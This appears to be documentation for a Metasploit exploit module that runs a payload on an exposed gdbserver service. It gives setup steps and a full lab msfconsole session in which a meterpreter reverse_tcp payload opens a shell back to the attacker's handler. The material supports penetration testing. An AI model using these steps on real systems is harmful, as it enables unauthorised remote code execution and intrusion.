## Vulnerable Application This module attempts to execute an arbitrary payload on a loose [gdbserver](https://sourceware.org/gdb/onlinedocs/gdb/Server.html) service. ## Installation Steps Install gdbserver: ``` apt-get install gdbserver ``` ## Verification Steps Start gdbserver on a TCP port: ``` gdbserver 0.0.0.0:1234 /bin/true ``` 1. Start msfconsole 1. Do: `use exploit/multi/gdb/gdb_server_exec` 1. Do: `set RHOSTS ` 1. Do: `set RPORT ` 1. Do: `run` 1. You should get a session. ## Options ## Scenarios ### gdbserver 10.2 on Ubuntu 20.04 (x86_64) ``` msf6 > use exploit/multi/gdb/gdb_server_exec [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/gdb/gdb_server_exec) > set rhosts 192.168.200.135 rhosts => 192.168.200.135 msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1234 rport => 1234 msf6 exploit(multi/gdb/gdb_server_exec) > set target x86_64 target => x86_64 msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/gdb/gdb_server_exec) > run [*] Started reverse TCP handler on 192.168.200.130:4444 [*] 192.168.200.135:1234 - Performing handshake with gdbserver... [*] 192.168.200.135:1234 - Stepping program to find PC... [*] 192.168.200.135:1234 - Writing payload at 00007ffff7fd0103... [*] 192.168.200.135:1234 - Executing the payload... [*] Sending stage (3020772 bytes) to 192.168.200.135 [*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.135:33198 ) at 2022-04-16 16:21:14 -0400 meterpreter > getuid Server username: user meterpreter > sysinfo Computer : 192.168.200.135 OS : Ubuntu 20.04 (Linux 5.13.0-35-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > ```